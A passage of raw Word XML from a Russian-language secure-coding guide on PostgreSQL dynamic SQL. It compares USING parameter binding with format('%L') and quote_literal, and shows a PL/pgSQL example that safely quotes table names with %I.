      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Сравнение: USING vs format('%L') vs `||`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116A171A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Для значения три способа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E050C0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- 1. USING (РЕКОМЕНДАЦИЯ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AC0CC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT * FROM t WHERE n = $1' USING value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D727DF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ bind, безопасно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C574080" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A524B57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- 2. format('%L', value)  (приемлемо, но менее эффективно)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220FE1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('SELECT * FROM t WHERE n = %L', value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C11FD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ value embedded в SQL-text через quote_literal — безопасно, но</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE2569" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ SQL парсится с literal внутри (плохо для plan cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201E057D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC545CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- 3. || quote_literal(value)  (приемлемо, legacy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D13CEEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT * FROM t WHERE n = ' || quote_literal(value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5FA78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ функционально как format('%L', ...), стиль старее</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6696930D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Различия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994422C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — bind via extended protocol, value не попадает в SQL-text → одна prepared statement reusable для разных values (plan cache benefit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BB73C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>format('%L')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — value embedded в SQL-text → новый plan per каждое value, медленнее на repeated calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55019E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`||` without quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>уязвимо</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.16.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012BD4F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USING — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>default choice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для значений. Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%L</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> только когда USING невозможен (например, для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без INTO в loop, или для построения VIEW DDL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09956438" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Edge case — USING внутри loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43326813" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Pattern: dynamic SQL в loop с разными identifier, общим value-binding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF7AED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.search_across(target text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ABCC55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS TABLE(tbl text, found_count bigint) LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACACAFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA649E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rec record;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2552BBEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cnt bigint;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FFFAE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448D27A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FOR rec IN SELECT table_name FROM information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF371B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               WHERE table_schema = 'public' AND table_type = 'BASE TABLE'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB20E21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    LOOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4E39F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        EXECUTE format('SELECT count(*) FROM %I WHERE description ILIKE $1', rec.table_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D5096" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            INTO cnt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32794DDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            USING '%' || target || '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC8959" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RETURN QUERY SELECT rec.table_name::text, cnt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601DFD69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END LOOP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F9C81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1573E844" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA245A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identifier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rec.table_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>из information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (не от user) — нет identifier-injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пробрасывается через USING — нет value-injection. LIKE pattern (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'%' || target || '%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — здесь pattern injection (3.15.1), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не SQL injection</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E570669" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Безопасный pattern</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но требует careful review: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всё ещё нужен escape для LIKE-wildcards (см. 3.15.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DD5D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Когда USING недостаточно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01208D71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DEEBB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Identifier (table/column/schema name) — нужен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.16.1/3.16.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B057FC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   DDL-statements (CREATE/ALTER/DROP) — DDL не имеет bind-positions; identifier обязательно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03F8B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Dynamic ORDER BY (см. 3.14)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C697566" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Dynamic LIMIT/OFFSET в plpgsql — теоретически возможно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но нужно cast </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1::int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C999A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для каждого из этих cases: identifier — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; значение для LIMIT — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1::int</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35178B95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>защитный pattern</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атаки нет, если используется правильно. Подраздел в категории описывает (1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>что USING закрывает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (value injection), (2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
